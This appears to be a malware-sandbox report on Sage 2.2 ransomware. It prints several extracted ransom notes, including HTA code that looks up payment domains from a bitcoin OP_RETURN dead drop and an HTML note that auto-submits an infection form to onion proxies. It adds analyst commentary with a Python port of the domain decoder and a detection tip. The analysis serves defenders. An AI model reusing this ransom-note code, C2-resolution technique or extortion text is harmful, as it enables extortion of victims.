.l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function 
aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" 
: "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < 
json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/Acyg4l6BhvWLA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ 
el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,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" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 
class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-ar' > الملف الذي كنت بصدد فتحه وبعض الملفات المهمة على حاسوبك تم تشفيرها "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که شما تلاش کردید بازکنید و فایل های کامپیوتر شما رمزگذاری شده است "SAGE 2.2 
Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2> <h2 class='l l-en' style='display:block'>Action required to restore your files.</h2><h2 class='l l-de' >Aktion erforderlich, um ihre Daten wiederherzustellen.</h2><h2 class='l l-it' >Azione necessaria per ripristinare i file.</h2><h2 class='l l-pt' >O que você deve fazer para restaurar seus arquivos.</h2><h2 class='l l-es' >Se requiere una acción para restaurar sus archivos.</h2><h2 class='l l-fr' >Action requise pour restaurer vos fichiers.</h2><h2 class='l l-kr' >파일을 복원하는 데 필요한 작업.</h2><h2 class='l l-nl' >Aktie vereist om je bestanden te herstellen.</h2><h2 class='l l-ar' > الإجراءات المطلوبة لاستعادة الملفات الخاصة بك.</h2><h2 class='l l-fa' >برای بازگرداندن فایل های خود را اقدام کنید.</h2><h2 class='l l-zh' >要恢复文件需要进行解密。</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnk
URLs

The two entries the sandbox's URL extractor caught (http://'+s.bp and http://'+s.bp+s.txp+tx) are JavaScript string concatenations, not literal URLs. Joining the split string literals in the script above gives the endpoints the HTA actually requests over plain HTTP, each with a cache-busting ?_=<timestamp> query appended by getPage():

http://btc.blockr.io/api/v1/address/txs/<address>

http://btc.blockr.io/api/v1/tx/info/<txid>

http://chain.so/api/v2/get_tx_unspent/btc/<address>

http://chain.so/api/v2/get_tx_outputs/btc/<txid>

http://bitaps.com/api/address/transactions/<address>/0/sent/all

http://bitaps.com/api/transaction/<txid>

http://api.blockcypher.com/v1/btc/main/addrs/<address>

http://api.blockcypher.com/v1/btc/main/txs/<txid>

where <address> is 1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7 (also split across five literals in the script) and <txid> is each transaction returned for it. The payment links written into the note have the form http://7gie6ffnkrjykggd.<domain>/login/Acyg4l6BhvWLA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A, with <domain> taken from the decoded OP_RETURN data.
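The interesting part of the Sage 2.2 HTA above is how it finds its payment portals: no domain is embedded anywhere. updateLinks() asks four public blockchain explorers for transactions sent from the bitcoin address 1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7, takes the first OP_RETURN output of each transaction (substr(10) skips the ten-character "OP_RETURN " prefix; the blockcypher source hands over data_hex directly), and runs decodeTxString over the payload. That routine is a chained XOR seeded with 0xAA: each output byte is the previous output byte XOR the next input byte. The result is a colon-separated list of domains, and each one is prefixed with 7gie6ffnkrjykggd. to form a portal URL. The block below is an added example, my own code rather than the malware's: a Python port of the decoder, an inverse encoder (the HTA has none; it exists here only to build test data), and the output-scanning step, run over constructed transaction outputs with placeholder domains.

```python
from typing import Iterable, List, Optional

# Values that appear in the HTA, split into string fragments there.
SEED_ADDRESS = "1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7"
ONION_LABEL = "7gie6ffnkrjykggd"
OP_RETURN_PREFIX = "OP_RETURN "   # 10 characters, hence the HTA's substr(10)


def decode_tx_string(hex_payload: str) -> str:
    """Port of decodeTxString(): chained XOR seeded with 0xAA.

    out[i] = out[i-1] ^ in[i], with out[-1] taken as 0xAA, so every byte of
    the payload depends on the previous plaintext byte, not on a fixed key.
    """
    state = 0xAA
    chars = []
    for byte in bytes.fromhex(hex_payload):
        state ^= byte
        chars.append(chr(state))
    return "".join(chars)


def encode_tx_string(text: str) -> str:
    """Inverse of decode_tx_string, used here only to build test data
    (the HTA carries no encoder; this function is my addition)."""
    prev = 0xAA
    encoded = bytearray()
    for byte in text.encode("latin-1"):
        encoded.append(byte ^ prev)
        prev = byte
    return encoded.hex()


def domains_from_outputs(asm_scripts: Iterable[str]) -> Optional[List[str]]:
    """Port of the per-explorer ptx() callbacks: the first output whose script
    starts with OP_RETURN carries the payload; decode it and split on ':'.
    Returns None when the transaction has no OP_RETURN output."""
    for asm in asm_scripts:
        if asm.startswith(OP_RETURN_PREFIX):
            return decode_tx_string(asm[len(OP_RETURN_PREFIX):]).split(":")
    return None


def portal_urls(domains: Iterable[str]) -> List[str]:
    """Mirror of the link text updateLinks() writes into the note."""
    return [f"http://{ONION_LABEL}.{domain}/" for domain in domains]


# Constructed transaction outputs (not real chain data): one ordinary P2PKH
# output followed by an OP_RETURN output carrying two placeholder domains.
CONSTRUCTED_DOMAINS = ["portal-one.invalid", "portal-two.invalid"]
CONSTRUCTED_OUTPUTS = [
    "OP_DUP OP_HASH160 0000000000000000000000000000000000000000 OP_EQUALVERIFY OP_CHECKSIG",
    OP_RETURN_PREFIX + encode_tx_string(":".join(CONSTRUCTED_DOMAINS)),
]

if __name__ == "__main__":
    print(decode_tx_string("cb03585907"))   # ab:cd
    for url in portal_urls(domains_from_outputs(CONSTRUCTED_OUTPUTS) or []):
        print(url)
```

Because the dead drop sits on the public chain, an analyst can fetch the same transactions for SEED_ADDRESS and recover the current domain list without ever executing the note. On the defensive side, mshta.exe making plain-HTTP requests to blockchain explorer APIs is unusual enough on a workstation to be worth an alert on its own.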

Extracted

Path: C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note
__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1O
UZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeI
KZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6
VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC
8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA
-----END PERSONAL IDENTIFIER-----

Your important documents, databases, documents, network folders are encrypted for your PC security problems.
No data from your computer has been stolen or deleted.
Follow the instructions to restore the files.

How to get the automatic decryptor:

1) Contact us by e-mail: [email protected]. In the letter, indicate your personal identifier (look at the beginning of this document) and the external ip-address of the computer on which the encrypted files are located.
2) After answering your request, our operator will give you further instructions that will show what to do next (the answer you will receive as soon as possible)

** Second email address [email protected]

Free decryption as guarantee!
Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 5Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.).

__________________________________________________________________________________________________
|                                                                                                  |
|                                     How to obtain Bitcoins?                                      |
|                                                                                                  |
|  * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click            |
|    'Buy bitcoins', and select the seller by payment method and price:                            |
|    https://localbitcoins.com/buy_bitcoins                                                        |
|  * Also you can find other places to buy Bitcoins and beginners guide here:                      |
|    http://www.coindesk.com/information/how-can-i-buy-bitcoins                                    |
|                                                                                                  |
|__________________________________________________________________________________________________|

__________________________________________________________________________________________________
|                                                                                                  |
|                                            Attention!                                            |
|                                                                                                  |
|  * Do not rename encrypted files.                                                                |
|  * Do not try to decrypt your data using third party software, it may cause permanent data loss. |
|  * Decryption of your files with the help of third parties may cause increased price             |
|    (they add their fee to our) or you can become a victim of a scam.                             |
|                                                                                                  |
|__________________________________________________________________________________________________|

Extracted

Path

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key?</h3> <p> First, you'll need to synchronize your computer with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your computer and the keys used to encrypt your files. 
However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your computer with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/NNYJZAHP_BA887275DA208E5B6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. 
</p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want to synchronize your computer now?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new 
ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" 
: "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < 
json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://z5dq36kjy5swjtmr.'+ds[i]+'/login/AQAAAAAAAAAAA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://z5dq36kjy5swjtmr.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ 
